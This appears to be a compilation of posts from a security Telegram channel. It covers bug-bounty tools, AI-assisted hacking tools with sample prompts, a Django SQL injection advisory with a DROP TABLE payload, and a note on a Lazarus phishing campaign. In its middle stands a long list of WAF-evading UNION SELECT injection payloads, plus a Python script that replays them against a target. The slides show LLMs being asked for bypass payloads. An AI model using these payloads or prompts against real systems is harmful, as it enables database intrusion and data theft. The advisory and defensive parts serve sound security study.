Reflix is a fuzzing tool for finding parameter reflections, which often lead to vulnerabilities such as XSS. The latest update adds headless-browser support. It scans a list of URLs, discovers their parameters, and reports which ones are reflected in the response; a custom wordlist further improves the odds of uncovering bugs.
Github-Repository: https://github.com/nexovir/reflix
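As a rough illustration of the reflection check such a tool automates (not Reflix's actual code; the marker value is arbitrary and the requests library is assumed):
import requests
from urllib.parse import urlparse, parse_qsl, urlencode, urlunparse

MARKER = "rfx9k7z"  # arbitrary unique string to look for in responses

def reflected_params(url):
    """Return the names of query parameters whose injected marker appears in the response body."""
    parts = urlparse(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    hits = []
    for i, (name, _) in enumerate(params):
        probe = list(params)
        probe[i] = (name, MARKER)  # replace one parameter value at a time
        probe_url = urlunparse(parts._replace(query=urlencode(probe)))
        try:
            body = requests.get(probe_url, timeout=10).text
        except requests.RequestException:
            continue
        if MARKER in body:
            hits.append(name)
    return hits

print(reflected_params("https://example.com/search?q=test&page=1"))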
#BugBounty #XSS #WebPentest #Hackerone
⭐️ @ZeroSec_team
⚡Autoswagger is a command-line tool that discovers and parses Swagger/OpenAPI documentation and then tests the documented endpoints for missing authentication. It helps surface security issues on unprotected API endpoints, such as PII leaks and exposed secrets.
https://github.com/intruder-io/autoswagger
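The underlying idea can be sketched roughly like this (the spec URL, base URL, and keyword list are placeholders; this is not Autoswagger's actual implementation):
import requests

SPEC_URL = "https://api.example.com/swagger.json"   # hypothetical spec location
BASE_URL = "https://api.example.com"
KEYWORDS = ("password", "token", "apikey", "secret", "email")  # crude PII/secret hints

spec = requests.get(SPEC_URL, timeout=10).json()

for path, methods in spec.get("paths", {}).items():
    if "get" not in methods or "{" in path:
        continue  # only probe non-templated GET endpoints in this sketch
    r = requests.get(BASE_URL + path, timeout=10)  # deliberately sent without any auth
    if r.ok:
        leaks = [k for k in KEYWORDS if k in r.text.lower()]
        flag = f"  possible exposure: {leaks}" if leaks else ""
        print(f"{r.status_code} {path}{flag}")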
⭐️ @Zerosec_team
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new items
🔹 HACKERONE: 2 new items
🔹 INTIGRITI: 0 new items
🔹 YESWEHACK: 0 new items
🔹 FEDERACY: 0 new items
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new items
🔹 HACKERONE: 0 new items
🔹 INTIGRITI: 0 new items
🔹 YESWEHACK: 0 new items
🔹 FEDERACY: 0 new items
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
💥 AI Tools Hackers Are Using in 2025 (Red-Team & Blue-Team POV)
---
Slide 1 — Hook
AI isn’t just generating images anymore — it’s accelerating hacking.
From automated recon to payload crafting and even full pentest reporting, here’s how attackers (and defenders) are using AI in 2025 — with real examples & how to defend.
---
Slide 2 — WRAITH (AI-Powered Recon Automation)
What it does
Auto-discovers assets, subdomains, tech stack, open ports.
Prioritizes targets using LLM reasoning.
Generates recon → exploit hypotheses.
Example workflow
wraith --target example.com --out recon.json
# Feed recon.json to LLM:
“Suggest top 5 exploit paths from this recon. Rank by impact & ease.”
Why it’s scary: Recon that took hours now happens in minutes, with smarter prioritization.
---
Slide 3 — PentestGPT (LLM for Pentest Planning & Reporting)
Use-cases
Turn raw notes into a structured methodology (OWASP, PTES).
Suggest payloads per finding (SQLi, SSTI, XXE, etc.).
Generate executive + technical reports fast.
Example prompt
You are my senior pentester. Target: api.example.com
Stack: Node.js, GraphQL
Give me:
1) Attack surface checklist
2) High-probability vulns to test
3) Example payloads per vuln
4) Reporting template with risk ratings (CVSS)
---
Slide 4 — BurpGPT (Burp Suite + LLM Payload Brain)
What it does
Reads intercepted requests
Suggests custom payloads (WAF-aware, context-aware)
Helps craft polyglot, obfuscated, or blind-exploitation payloads
Example
Request:
POST /search {"q": "john"}
Prompt to BurpGPT:
“Generate 10 WAF-bypassing SQLi payloads for JSON body with parameter ‘q’. DB type unknown. Also give time-based blind variants.”
---
Slide 5 — X-Bow / Autonomous Pentest Engines
What they do
Chain recon → exploit → validate → write report
Can iterate on responses (e.g., WAF blocks)
Can run multi-step campaigns (dir brute force → SSRF → metadata steal → privilege escalation)
Example high-level flow (pseudo)
xbow --scope scope.txt
→ Asset discovery
→ LFI found → RCE candidate path suggested
→ Exploit validated
→ Draft report with PoC + risk score auto-generated
---
Slide 6 — ShellGPT / Terminal + AI = Lethal
Why it’s useful
Writes bash one-liners for recon, fuzzing, log triage
Summarizes verbose tool output (nmap, nuclei, logs)
Example prompt
I have a wordlist subdomains.txt and want to resolve only live subdomains to alive.txt using httpx. Write a one-liner and explain each flag.
Bonus: Ask it to “fix this exploit script that’s failing on Python 3.12” — instant debugging.
---
Slide 7 — AI-Driven Phishing & MFA Fatigue Campaigns (Defense POV)
Attackers use AI to
Clone writing styles from leaked emails
Auto-generate reverse proxy phishing kits (Evilginx2-like)
Craft localized, hyper-personalized lures
Automate MFA fatigue (“push bombing”) campaigns with scripted social engineering
Defend with
FIDO2/WebAuthn (phish-resistant MFA)
Conditional access + impossible travel policies
User-behavior baselines + anomaly detection
---
Slide 8 — AI for Exploit Dev & Patch Diffing
Use-cases
Turn a PoC into a Metasploit module
Explain complex deserialization chains
Diff two versions of source code/binary and ask “What vuln was patched?”
Prompt example
Here’s a failing PoC for CVE-XXXX-YYYY. Fix it for Python 3.12, add argparse, and explain the root cause + exploitation path in comments.
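As a concrete, simplified illustration of the patch-diffing step, the sketch below uses Python's standard-library difflib to build a unified diff of two source versions that you can then paste into an LLM with a "what vuln was patched?" prompt (file names are placeholders):
import difflib
from pathlib import Path

# Placeholder paths: the vulnerable and the patched version of the same source file.
old = Path("service_v1.py").read_text().splitlines(keepends=True)
new = Path("service_v2.py").read_text().splitlines(keepends=True)

# Unified diff of the two versions; hand this to an LLM and ask what was fixed and why.
diff = difflib.unified_diff(old, new, fromfile="service_v1.py", tofile="service_v2.py")
print("".join(diff))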
---
Slide 9 — Blue-Team: How to Defend Against AI-Augmented Attackers
1. Phish-resistant MFA (FIDO2, hardware keys).
2. Attack surface monitoring — your own “Wraith” for blue team.
3. LLM-assisted log analysis (explain spikes, rare sequences, failed OAuth flows).
4. Prompt-hardened AI apps — sanitize model inputs, enforce allowlists.
5. Rate-limit & anomaly-detect AI-driven brute-force / fuzzing.
6. Automatic report diffing for repeated exploit vectors from bug bounty submissions.
---
Slide 10 — Ethics, Compliance & Reality
These tools can be weaponized.
Use only on assets you own or have written authorization for.
Always document consent, scope, and reporting responsibly.
⭐️ @ZeroSec_team
🔴 A SQL injection vulnerability, tracked as CVE-2025-57833, has been fixed in Django. It carries a CVSS score of 7.1 (high severity).
Affected versions:
- Django main
- Django 5.2
- Django 5.1
- Django 4.2
Patched versions: 4.2.24, 5.1.12, 5.2.6 and later
The vulnerability lies in FilteredRelation and is triggered when it is used together with **kwargs expansion in the QuerySet.annotate or QuerySet.alias methods.
- FilteredRelation is a Django ORM feature that lets you apply a condition to a relation (such as a ForeignKey). For example, the following code fetches only each post's active comments:
qs = Post.objects.annotate(
active_comments=FilteredRelation("comments", condition=Q(comments__is_active=True))
)
- The annotate method is used to add computed columns (such as count or sum) to a query.
- The alias method works exactly like annotate, but it does not create a new column; it only attaches an alias to the SQL expression.
For example, in the code below num_comments becomes an alias for COUNT(comments).
qs = Post.objects.annotate(num_comments=Count("comments"))
- In Python, when a function is called, parameters can either be passed directly or unpacked from a dict with **. Direct form:
greet(name="onhexgroup", age=25)
With **dict unpacking:
info = {"name": "onhexgroup", "age": 25}
greet(**info)
In this case Python unpacks the dictionary into keyword arguments, i.e., it is equivalent to:
greet(name="onhexgroup", age=25)
In Django, if we have this:
user_alias = "custom_label"  # user input
qs = Order.objects.annotate(**{user_alias: F("payment__amount")})
print(str(qs.query))
The resulting SQL:
SELECT "myapp_order"."id",
"myapp_payment"."amount" AS "custom_label"
FROM "myapp_order"
LEFT OUTER JOIN "myapp_payment"
ON ("myapp_order"."id" = "myapp_payment"."order_id");
Django normally wraps aliases in double quotes, but in FilteredRelation, when the alias comes in through **kwargs, it is placed into the SQL raw. So if an attacker supplies this input:
user_alias = 'custom_label"; DROP TABLE users; --'
qs = Order.objects.annotate(**{user_alias: F("payment__amount")})
print(str(qs.query))
it turns into:
SELECT "myapp_order"."id",
"myapp_payment"."amount" AS custom_label"; DROP TABLE users; --
FROM "myapp_order"
and as a result the SQL injection fires.
You can review the full write-up and PoC for this vulnerability here.
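The real fix is upgrading to a patched release; as an extra defensive layer, a minimal sketch (hypothetical helper, not part of Django) of validating user-supplied aliases before unpacking them into annotate() could look like this:
def annotate_with_user_alias(queryset, alias, expression):
    # Only accept plain Python identifiers as aliases, so quotes and SQL
    # fragments like '"; DROP TABLE users; --' are rejected up front.
    if not isinstance(alias, str) or not alias.isidentifier():
        raise ValueError(f"invalid alias: {alias!r}")
    return queryset.annotate(**{alias: expression})

# Usage with the models from the snippet above (hypothetical):
# qs = annotate_with_user_alias(Order.objects.all(), user_alias, F("payment__amount"))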
#Django #Python #SQLInjection #SQLi
⭐️ @ZeroSec_team
Django Project
Django security releases issued: 5.2.6, 5.1.12, and 4.2.24
Posted by Sarah Boyce on Sept. 3, 2025
Share your experience about WEB LLM ATTACKS with us via the channel's direct message.
Jason Haddix’s Article about HACKBOTS
https://executiveoffense.beehiiv.com/p/ai-hackbots-part-1
⭐️ @ZeroSec_team
Bypass SQL union select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLecT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
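A minimal Python sketch of replaying a list like this against an endpoint you are authorized to test (the target URL, parameter name, and wordlist path are hypothetical). Most of these payloads are already URL-encoded, so they are appended to the query string rather than passed through params=, which would re-encode them:
import requests

BASE = "https://target.example/search"   # hypothetical in-scope endpoint
PARAM = "q"                              # hypothetical injectable parameter

with open("union_bypasses.txt") as f:
    payloads = [line.strip() for line in f if line.strip()]

# Baseline response for a harmless value, used to spot behavioural differences.
baseline = requests.get(BASE, params={PARAM: "test"}, timeout=10)

for p in payloads:
    # Append the pre-encoded payload to the raw query string instead of re-encoding it.
    r = requests.get(f"{BASE}?{PARAM}=test{p}", timeout=10)
    if r.status_code != baseline.status_code or abs(len(r.text) - len(baseline.text)) > 100:
        print(f"[i] differing response for payload: {p!r}")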
#Bypass #SQL
⭐️ @ZeroSec_team
Defender for Identity
(formerly known as Azure Advanced Threat Protection, or Azure ATP) is a Microsoft cloud security service focused on Active Directory (AD) and Azure AD. Its main purpose is to detect threats, attacks, and lateral movement within the network.
⭐️ @ZeroSec_team
Microsoft Defender for Identity in Depth.pdf
51.2 MB
🚨 XSS in Google IDX Workstation → RCE! $22,500 Bounty Earned 💰
Author: Aditya Sunny
Follow on LinkedIn: @adityasunny06
Program: Google VRP
Status: Accepted & Fixed ✅
Reward: $22,500 💸
https://infosecwriteups.com/xss-in-google-idx-workstation-rce-22-500-bounty-earned-2d09f0176869?gi=c80bc4672c8b
⭐️ @ZeroSec_team
From Blind XSS to RCE: When Headers Became My Terminal
https://is4curity.medium.com/from-blind-xss-to-rce-when-headers-became-my-terminal-d137d2c808a3
⭐️ @Zerosec_team
Forwarded from Hacking Articles
🚀 AI Penetration Training (Online) – Register Now! 🚀
🔗 Register here: https://forms.gle/bowpX9TGEs41GDG99
💬 WhatsApp: https://wa.me/message/HIOPPNENLOX6F1
📧 Email: info@ignitetechnologies.in
Limited slots available! Hurry up to secure your spot in this exclusive training program offered by Ignite Technologies.
🧠 LLM Architecture
🔐 LLM Security Principles
🗄 Data Security in AI Systems
🛡 Model Security
🏗 Infrastructure Security
📜 OWASP Top 10 for LLMs
⚙️ LLM Installation and Deployment
📡 Model Context Protocol (MCP)
🚀 Publishing Your Model Using Ollama
🔍 Introduction to Retrieval-Augmented Generation (RAG)
🌐 Making Your AI Application Public
📊 Types of Enumeration Using AI
🎯 Prompt Injection Attacks
🐞 Exploiting LLM APIs: Real-World Bug Scenarios
🔑 Password Leakage via AI Models
🎭 Indirect Prompt Injection Techniques
⚠️ Misconfigurations in LLM Deployments
👑 Exploitation of LLM APIs with Excessive Privileges
📝 Content Manipulation in LLM Outputs
📤 Data Extraction Attacks on LLMs
🔒 Securing AI Systems
🧾 System Prompts and Their Security Implications
🤖 Automated Penetration Testing with AI
The Lazarus Group, an APT widely linked to North Korea, has recently adopted a social engineering technique known as ClickFix. In this method, the attacker fabricates a fake problem (for example, claiming that your camera is broken or that an update must be installed) and tricks the victim into clicking a link or executing a command that actually runs malicious code. Lazarus has been using this technique primarily in fake job-interview scenarios targeting the cryptocurrency sector, which is why the new campaign is known as ClickFake Interview.
In these attacks, the victim is typically presented with malicious files such as ClickFix-1.bat or compressed packages like nvidiaRelease.zip. These files execute malware families such as BeaverTail and InvisibleFerret, designed to steal information and establish hidden access. Interestingly, Lazarus has built multiple variants of these malware strains — ranging from PowerShell and Node.js scripts on Windows to Golang binaries that run across Windows, Linux, and even macOS (both ARM and Intel).
⭐️ @ZeroSec_team